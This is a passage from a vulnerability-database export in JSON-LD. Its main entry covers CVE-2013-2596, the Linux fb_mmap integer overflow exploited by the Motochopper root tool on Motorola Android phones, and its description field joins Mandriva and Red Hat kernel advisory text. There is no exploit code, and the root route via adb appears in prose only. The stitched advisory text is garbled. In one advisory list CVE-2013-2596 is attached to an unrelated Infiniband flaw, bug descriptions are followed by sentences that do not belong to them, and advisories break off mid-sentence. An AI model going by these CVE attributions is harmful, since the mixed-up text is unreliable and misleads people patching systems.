      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerabilities related to lack of effective post-lifetime resource release",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010145"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201909-1341"
      }
    ],
    "trust": 0.6
  }
}

var-201304-0124
Vulnerability from variot

Integer overflow in the fb_mmap function in drivers/video/fbmem.c in the Linux kernel before 3.8.9, as used in a certain Motorola build of Android 4.1.2 and other products, allows local users to create a read-write memory mapping for the entirety of kernel memory, and consequently gain privileges, via crafted /dev/graphics/fb0 mmap2 system calls, as demonstrated by the Motochopper pwn program. The Motorola Razr HD, Razr M and Atrix HD devices are devices that use the Qualcomm MSM8960 chip. Motorola Razr HD, Razr M and Atrix HD devices using Qualcomm's MSM8960 chip have security vulnerabilities under the Android 4.1.2 platform. Allows an attacker to connect to USB debugging mode, use the Android Debug Bridge (adb) to create a USB link, upload and execute the Motochopper pwn program to gain root access. Multiple Motorola devices for Android are prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain root privileges, which may aid in further attacks. (CVE-2013-2596)

arch/x86/kernel/cpu/perf_event_intel.c in the Linux kernel before 3.8.9, when the Performance Events Subsystem is enabled, specifies an incorrect bitmask, which allows local users to cause a denial of service (general protection fault and system crash) by attempting to set a reserved bit. (CVE-2013-1798)

Use-after-free vulnerability in arch/x86/kvm/x86.c in the Linux kernel through 3.8.4 allows guest OS users to cause a denial of service (host OS memory corruption) or possibly have unspecified other impact via a crafted application that triggers use of a guest physical address (GPA) in (1) movable or (2) removable memory during an MSR_KVM_SYSTEM_TIME kvm_set_msr_common operation. (CVE-2013-2141)

Heap-based buffer overflow in the tg3_read_vpd function in drivers/net/ethernet/broadcom/tg3.c in the Linux kernel before 3.8.6 allows physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via crafted firmware that specifies a long string in the Vital Product Data (VPD) data structure. (CVE-2013-1929)

The main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as distributed in the Linux kernel before 3.8-rc1, allows local users to cause a denial of service (daemon exit) via a crafted application that sends a Netlink message. NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-2669. (CVE-2013-1848)

The flush_signal_handlers function in kernel/signal.c in the Linux kernel before 3.8.4 preserves the value of the sa_restorer field across an exec operation, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application containing a sigaction system call. (CVE-2013-0914)

Heap-based buffer overflow in the wdm_in_callback function in drivers/usb/class/cdc-wdm.c in the Linux kernel before 3.8.4 allows physically proximate attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a crafted cdc-wdm USB device. (CVE-2013-2548)

The translate_desc function in drivers/vhost/vhost.c in the Linux kernel before 3.7 does not properly handle cross-region descriptors, which allows guest OS users to obtain host OS privileges by leveraging KVM guest OS privileges. (CVE-2013-0228)

Memory leak in drivers/net/xen-netback/netback.c in the Xen netback functionality in the Linux kernel before 3.7.8 allows guest OS users to cause a denial of service (memory consumption) by triggering certain error conditions. (CVE-2013-0217)

The Xen netback functionality in the Linux kernel before 3.7.8 allows guest OS users to cause a denial of service (loop) by triggering ring pointer corruption. (CVE-2012-6547)

The updated packages provides a solution for these security issues. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/en/support/security/advisories/

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com


Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFRyE83mqjQ0CJFipgRAgpsAKDCNZxW0lBVmcEPovg8gYgjVzLm4wCgpzoW s4hnEgkN4Re4xoskJoTdPM0= =gyQf -----END PGP SIGNATURE-----

. 6.2) - x86_64

  1. The ETHTOOL_DELAY variable has been added, which makes sure the ethtool utility waits for some time before it tries to apply the options settings, thus fixing the bug. (BZ#1138299)

  2. During the memory allocation for a new socket to communicate to the server, the rpciod daemon released a clean page which needed to be committed. However, the commit was queueing indefinitely as the commit could only be provided with a socket connection. As a consequence, a deadlock occurred in rpciod. This update sets the PF_FSTRANS flag on the work queue task prior to the socket allocation, and adds the nfs_release_page check for the flag when deciding whether to make a commit call, thus fixing this bug.

  3. It was found that the Linux kernel's Infiniband subsystem did not properly sanitize input parameters while registering memory regions from user space via the (u)verbs API. (CVE-2013-2596, Important)

  4. It was found that the Linux kernel's KVM implementation did not ensure that the host CR4 control register value remained unchanged across VM entries on the same virtual CPU. (CVE-2014-3690, Moderate)

  5. It was found that the parse_rock_ridge_inode_internal() function of the Linux kernel's ISOFS implementation did not correctly check relocated directories when processing Rock Ridge child link (CL) tags. (CVE-2014-5471, CVE-2014-5472, Low)

  6. A stack-based buffer overflow flaw was found in the TechnoTrend/Hauppauge DEC USB device driver.

This update also fixes the following bugs:

  • Previously, a NULL pointer check that is needed to prevent an oops in the nfs_async_inode_return_delegation() function was removed. As a consequence, a NFS4 client could terminate unexpectedly. The missing NULL pointer check has been added back, and NFS4 client no longer crashes in this situation. (BZ#1187638)

  • Due to unbalanced multicast join and leave processing, the attempt to leave a multicast group that had not previously completed a join became unresponsive. This update resolves multiple locking issues in the IPoIB multicast code that allowed multicast groups to be left before the joining was entirely completed. Now, multicast join and leave failures or lockups no longer occur in the described situation. (BZ#1187663)

  • A failure to leave a multicast group which had previously been joined prevented the attempt to unregister from the "sa" service. Multiple locking issues in the IPoIB multicast join and leave processing have been fixed so that leaving a group that has completed its join process is successful. As a result, attempts to unregister from the "sa" service no longer lock up due to leaked resources. (BZ#1187665)

  • Due to a regression, when large reads which partially extended beyond the end of the underlying device were done, the raw driver returned the EIO error code instead of returning a short read covering the valid part of the device. The underlying source code has been patched, and the raw driver now returns a short read for the remainder of the device.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

  1. Bugs fixed (https://bugzilla.redhat.com/):

1034490 - CVE-2013-2596 kernel: integer overflow in fb_mmap 1134099 - CVE-2014-5471 CVE-2014-5472 kernel: isofs: unbound recursion when processing relocated directories 1153322 - CVE-2014-3690 kernel: kvm: vmx: invalid host cr4 handling across vm entries 1164266 - CVE-2014-8884 kernel: usb: buffer overflow in ttusb-dec 1181166 - CVE-2014-8159 kernel: infiniband: uverbs: unprotected physical memory access 1196581 - CVE-2015-1421 kernel: net: slab corruption from use after free on INIT collisions

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2014:1392-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1392.html Issue date: 2014-10-14 CVE Names: CVE-2013-2596 CVE-2013-4483 CVE-2014-0181 CVE-2014-3122 CVE-2014-3601 CVE-2014-4608 CVE-2014-4653 CVE-2014-4654 CVE-2014-4655 CVE-2014-5045 CVE-2014-5077 =====================================================================

  1. Summary:

Updated kernel packages that fix multiple security issues, address several hundred bugs, and add numerous enhancements are now available as part of the ongoing support and maintenance of Red Hat Enterprise Linux version 6. This is the sixth regular update.

Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

  • A NULL pointer dereference flaw was found in the way the Linux kernel's Stream Control Transmission Protocol (SCTP) implementation handled simultaneous connections between the same hosts. A remote attacker could use this flaw to crash the system. (CVE-2014-5077, Important)

  • An integer overflow flaw was found in the way the Linux kernel's Frame Buffer device implementation mapped kernel memory to user space via the mmap syscall. A local user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to escalate their privileges on the system. (CVE-2013-2596, Important)

  • A flaw was found in the way the ipc_rcu_putref() function in the Linux kernel's IPC implementation handled reference counter decrementing. A local, unprivileged user could use this flaw to trigger an Out of Memory (OOM) condition and, potentially, crash the system. (CVE-2013-4483, Moderate)

  • It was found that the permission checks performed by the Linux kernel when a netlink message was received were not sufficient. A local, unprivileged user could potentially bypass these restrictions by passing a netlink socket as stdout or stderr to a more privileged process and altering the output of this process. (CVE-2014-0181, Moderate)

  • It was found that the try_to_unmap_cluster() function in the Linux kernel's Memory Managment subsystem did not properly handle page locking in certain cases, which could potentially trigger the BUG_ON() macro in the mlock_vma_page() function. A local, unprivileged user could use this flaw to crash the system. (CVE-2014-3122, Moderate)

  • A flaw was found in the way the Linux kernel's kvm_iommu_map_pages() function handled IOMMU mapping failures. A privileged user in a guest with an assigned host device could use this flaw to crash the host. (CVE-2014-3601, Moderate)

  • Multiple use-after-free flaws were found in the way the Linux kernel's Advanced Linux Sound Architecture (ALSA) implementation handled user controls. A local, privileged user could use either of these flaws to crash the system. (CVE-2014-4653, CVE-2014-4654, CVE-2014-4655, Moderate)

  • A flaw was found in the way the Linux kernel's VFS subsystem handled reference counting when performing unmount operations on symbolic links. A local, unprivileged user could use this flaw to exhaust all available memory on the system or, potentially, trigger a use-after-free error, resulting in a system crash or privilege escalation. (CVE-2014-5045, Moderate)

  • An integer overflow flaw was found in the way the lzo1x_decompress_safe() function of the Linux kernel's LZO implementation processed Literal Runs. A local attacker could, in extremely rare cases, use this flaw to crash the system or, potentially, escalate their privileges on the system. (CVE-2014-4608, Low)

Red Hat would like to thank Vladimir Davydov of Parallels for reporting CVE-2013-4483, Jack Morgenstein of Mellanox for reporting CVE-2014-3601, Vasily Averin of Parallels for reporting CVE-2014-5045, and Don A. Bailey from Lab Mouse Security for reporting CVE-2014-4608. The security impact of the CVE-2014-3601 issue was discovered by Michael Tsirkin of Red Hat.

This update also fixes several hundred bugs and adds numerous enhancements. Refer to the Red Hat Enterprise Linux 6.6 Release Notes for information on the most significant of these changes, and the Technical Notes for further information, both linked to in the References.

All Red Hat Enterprise Linux 6 users are advised to install these updated packages, which correct these issues, and fix the bugs and add the enhancements noted in the Red Hat Enterprise Linux 6.6 Release Notes and Technical Notes. The system must be rebooted for this update to take effect.

  1. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258

To install kernel packages manually, use "rpm -ivh [package]". Do not use "rpm -Uvh" as that will remove the running kernel binaries from your system. You may use "rpm -e" to remove old kernels after determining that the new kernel functions properly on your system.

  1. Bugs fixed (https://bugzilla.redhat.com/):

739866 - checkpolicy cannot parse /selinux/policy on ppc64 and s390x 786463 - nfs mount hangs when kerberos ticket expires 889471 - [Btrfs] BUG: unable to handle kernel NULL pointer dereference at (null) btrfs_get_sb should return error when open_ctree failed 915862 - The sync mount option does not work for NFSv4 mounts in RHEL6 997651 - possible recursive locking detected 998024 - nfsd sometimes grants delegations too soon following conflicting open requests 1010882 - kvm: backport "Improve create VCPU parameter" 1024854 - CVE-2013-4483 kernel: ipc: ipc_rcu_putref refcount races 1027480 - alb_send_learning_packets using an obsolete EtherType 1030411 - resizing thin-snapshot with external origin should return zeros behind origin's end 1031488 - Restore the mask bit correctly in eoi_ioapic_irq() 1034490 - CVE-2013-2596 kernel: integer overflow in fb_mmap 1036972 - use after free in new nfsd DRC code 1044438 - cifs: Unable to append to an existing file in cache=none mode. 1059496 - KVM: x86 emulator: Implement jmp far opcode ff/5 1063836 - kvm: 23090: cpu0 unhandled wrmsr 0x391 data 2000000f 1065304 - kernel/sched: incorrect setup of sched_group->cpu_power for NUMA systems 1069028 - ixgbevf prematurely strips VLAN tags 1072373 - Along with the increase of vCPUs in guest, and guest OS will spend more time to boot up in specified machine. 1077463 - gfs2: quotas not refreshed in gfs2_adjust_quota 1090423 - Data integrity issue on rebuilding RAID 6 with 100MB resync speed 1093076 - CVE-2014-3122 Kernel: mm: try_to_unmap_cluster() should lock_page() before mlocking 1094265 - CVE-2014-0181 kernel: net: insufficient permision checks of netlink messages 1095627 - missing vhost schedule causing thread starvation 1100523 - ext4 filesystem option 'max_batch_time' actually displays 'min_batch_time' in /proc/mounts 1113409 - CVE-2014-4653 Kernel: ALSA: control: do not access controls outside of protected regions 1113445 - CVE-2014-4654 CVE-2014-4655 Kernel: ALSA: control: use-after-free in replacing user controls 1113899 - CVE-2014-4608 kernel: lzo1x_decompress_safe() integer overflow 1118123 - [Hyper-V][REHL 6.6] fcopy large file from host to guest failed 1122472 - CVE-2014-5045 kernel: vfs: refcount issues during unmount on symlink 1122982 - CVE-2014-5077 Kernel: net: SCTP: fix a NULL pointer dereference during INIT collisions 1124351 - raid1 Data corruption after recovery with bitmap 1127231 - dmeventd hanging while handling lost leg in RAID1 LV 1131951 - CVE-2014-3601 kernel: kvm: invalid parameter passing in kvm_iommu_map_pages()

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-504.el6.src.rpm

i386: kernel-2.6.32-504.el6.i686.rpm kernel-debug-2.6.32-504.el6.i686.rpm kernel-debug-debuginfo-2.6.32-504.el6.i686.rpm kernel-debug-devel-2.6.32-504.el6.i686.rpm kernel-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm kernel-devel-2.6.32-504.el6.i686.rpm kernel-headers-2.6.32-504.el6.i686.rpm perf-2.6.32-504.el6.i686.rpm perf-debuginfo-2.6.32-504.el6.i686.rpm python-perf-debuginfo-2.6.32-504.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-504.el6.noarch.rpm kernel-doc-2.6.32-504.el6.noarch.rpm kernel-firmware-2.6.32-504.el6.noarch.rpm

x86_64: kernel-2.6.32-504.el6.x86_64.rpm kernel-debug-2.6.32-504.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debug-devel-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm kernel-devel-2.6.32-504.el6.x86_64.rpm kernel-headers-2.6.32-504.el6.x86_64.rpm perf-2.6.32-504.el6.x86_64.rpm perf-debuginfo-2.6.32-504.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm perf-debuginfo-2.6.32-504.el6.i686.rpm python-perf-2.6.32-504.el6.i686.rpm python-perf-debuginfo-2.6.32-504.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm perf-debuginfo-2.6.32-504.el6.x86_64.rpm python-perf-2.6.32-504.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-504.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-504.el6.noarch.rpm kernel-doc-2.6.32-504.el6.noarch.rpm kernel-firmware-2.6.32-504.el6.noarch.rpm

x86_64: kernel-2.6.32-504.el6.x86_64.rpm kernel-debug-2.6.32-504.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debug-devel-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm kernel-devel-2.6.32-504.el6.x86_64.rpm kernel-headers-2.6.32-504.el6.x86_64.rpm perf-2.6.32-504.el6.x86_64.rpm perf-debuginfo-2.6.32-504.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

x86_64: kernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm perf-debuginfo-2.6.32-504.el6.x86_64.rpm python-perf-2.6.32-504.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source: kernel-2.6.32-504.el6.src.rpm

i386: kernel-2.6.32-504.el6.i686.rpm kernel-debug-2.6.32-504.el6.i686.rpm kernel-debug-debuginfo-2.6.32-504.el6.i686.rpm kernel-debug-devel-2.6.32-504.el6.i686.rpm kernel-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm kernel-devel-2.6.32-504.el6.i686.rpm kernel-headers-2.6.32-504.el6.i686.rpm perf-2.6.32-504.el6.i686.rpm perf-debuginfo-2.6.32-504.el6.i686.rpm python-perf-debuginfo-2.6.32-504.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-504.el6.noarch.rpm kernel-doc-2.6.32-504.el6.noarch.rpm kernel-firmware-2.6.32-504.el6.noarch.rpm

ppc64: kernel-2.6.32-504.el6.ppc64.rpm kernel-bootwrapper-2.6.32-504.el6.ppc64.rpm kernel-debug-2.6.32-504.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-504.el6.ppc64.rpm kernel-debug-devel-2.6.32-504.el6.ppc64.rpm kernel-debuginfo-2.6.32-504.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-504.el6.ppc64.rpm kernel-devel-2.6.32-504.el6.ppc64.rpm kernel-headers-2.6.32-504.el6.ppc64.rpm perf-2.6.32-504.el6.ppc64.rpm perf-debuginfo-2.6.32-504.el6.ppc64.rpm python-perf-debuginfo-2.6.32-504.el6.ppc64.rpm

s390x: kernel-2.6.32-504.el6.s390x.rpm kernel-debug-2.6.32-504.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-504.el6.s390x.rpm kernel-debug-devel-2.6.32-504.el6.s390x.rpm kernel-debuginfo-2.6.32-504.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-504.el6.s390x.rpm kernel-devel-2.6.32-504.el6.s390x.rpm kernel-headers-2.6.32-504.el6.s390x.rpm kernel-kdump-2.6.32-504.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-504.el6.s390x.rpm kernel-kdump-devel-2.6.32-504.el6.s390x.rpm perf-2.6.32-504.el6.s390x.rpm perf-debuginfo-2.6.32-504.el6.s390x.rpm python-perf-debuginfo-2.6.32-504.el6.s390x.rpm

x86_64: kernel-2.6.32-504.el6.x86_64.rpm kernel-debug-2.6.32-504.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debug-devel-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm kernel-devel-2.6.32-504.el6.x86_64.rpm kernel-headers-2.6.32-504.el6.x86_64.rpm perf-2.6.32-504.el6.x86_64.rpm perf-debuginfo-2.6.32-504.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm perf-debuginfo-2.6.32-504.el6.i686.rpm python-perf-2.6.32-504.el6.i686.rpm python-perf-debuginfo-2.6.32-504.el6.i686.rpm

ppc64: kernel-debug-debuginfo-2.6.32-504.el6.ppc64.rpm kernel-debuginfo-2.6.32-504.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-504.el6.ppc64.rpm perf-debuginfo-2.6.32-504.el6.ppc64.rpm python-perf-2.6.32-504.el6.ppc64.rpm python-perf-debuginfo-2.6.32-504.el6.ppc64.rpm

s390x: kernel-debug-debuginfo-2.6.32-504.el6.s390x.rpm kernel-debuginfo-2.6.32-504.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-504.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-504.el6.s390x.rpm perf-debuginfo-2.6.32-504.el6.s390x.rpm python-perf-2.6.32-504.el6.s390x.rpm python-perf-debuginfo-2.6.32-504.el6.s390x.rpm

x86_64: kernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm perf-debuginfo-2.6.32-504.el6.x86_64.rpm python-perf-2.6.32-504.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source: kernel-2.6.32-504.el6.src.rpm

i386: kernel-2.6.32-504.el6.i686.rpm kernel-debug-2.6.32-504.el6.i686.rpm kernel-debug-debuginfo-2.6.32-504.el6.i686.rpm kernel-debug-devel-2.6.32-504.el6.i686.rpm kernel-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm kernel-devel-2.6.32-504.el6.i686.rpm kernel-headers-2.6.32-504.el6.i686.rpm perf-2.6.32-504.el6.i686.rpm perf-debuginfo-2.6.32-504.el6.i686.rpm python-perf-debuginfo-2.6.32-504.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-504.el6.noarch.rpm kernel-doc-2.6.32-504.el6.noarch.rpm kernel-firmware-2.6.32-504.el6.noarch.rpm

x86_64: kernel-2.6.32-504.el6.x86_64.rpm kernel-debug-2.6.32-504.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debug-devel-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm kernel-devel-2.6.32-504.el6.x86_64.rpm kernel-headers-2.6.32-504.el6.x86_64.rpm perf-2.6.32-504.el6.x86_64.rpm perf-debuginfo-2.6.32-504.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-2.6.32-504.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-504.el6.i686.rpm perf-debuginfo-2.6.32-504.el6.i686.rpm python-perf-2.6.32-504.el6.i686.rpm python-perf-debuginfo-2.6.32-504.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-2.6.32-504.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-504.el6.x86_64.rpm perf-debuginfo-2.6.32-504.el6.x86_64.rpm python-perf-2.6.32-504.el6.x86_64.rpm python-perf-debuginfo-2.6.32-504.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package

  1. References:

https://www.redhat.com/security/data/cve/CVE-2013-2596.html https://www.redhat.com/security/data/cve/CVE-2013-4483.html https://www.redhat.com/security/data/cve/CVE-2014-0181.html https://www.redhat.com/security/data/cve/CVE-2014-3122.html https://www.redhat.com/security/data/cve/CVE-2014-3601.html https://www.redhat.com/security/data/cve/CVE-2014-4608.html https://www.redhat.com/security/data/cve/CVE-2014-4653.html https://www.redhat.com/security/data/cve/CVE-2014-4654.html https://www.redhat.com/security/data/cve/CVE-2014-4655.html https://www.redhat.com/security/data/cve/CVE-2014-5045.html https://www.redhat.com/security/data/cve/CVE-2014-5077.html https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/6.6_Technical_Notes/kernel.html#RHSA-2014-1392 https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html-single/6.6_Release_Notes/index.html

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFUPKxFXlSAg2UNWIIRAkwDAJ9mvXUXLdfD/FRwrdkPl2+B610zpACdHa+q m8JupSzJWBzh/fi0DUX0uyI= =D7cp -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2013-2596, Important)

  • It was found that the Xen hypervisor x86 CPU emulator implementation did not correctly handle certain instructions with segment overrides, potentially resulting in a memory corruption. The provided patch ensures that the division is only performed if the CPU power is not zero, and the aforementioned panic no longer occurs. (BZ#1209728)

  • Prior to this update, a bug occurred when performing an online resize of an ext4 file system which had been previously converted from ext3. The provided patch fixes online resizing for such file systems by limiting the blockgroup search loop for non-extent files, and the mentioned kernel crash no longer occurs. This bug has been fixed by defining a new div64_ul() division function and correcting the affected calculation in the proc_sched_show_task() function. (BZ#1199898)

  • When repeating a Coordinated Universal Time (UTC) value during a leap second (when the UTC time should be 23:59:60), the International Atomic Time (TAI) timescale previously stopped as the kernel NTP code incremented the TAI offset one second too late. A patch has been provided, which fixes the bug by incrementing the offset during the leap second itself. Now, the correct TAI is set during the leap second

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201304-0124",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.8.9"
      },
      {
        "model": "atrix hd",
        "scope": null,
        "trust": 1.4,
        "vendor": "motorola",
        "version": null
      },
      {
        "model": "razr m",
        "scope": null,
        "trust": 1.4,
        "vendor": "motorola",
        "version": null
      },
      {
        "model": "razr hd",
        "scope": null,
        "trust": 1.4,
        "vendor": "motorola",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.2.45"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "motorola",
        "version": "4.1.2"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.5"
      },
      {
        "model": "made android",
        "scope": "eq",
        "trust": 0.8,
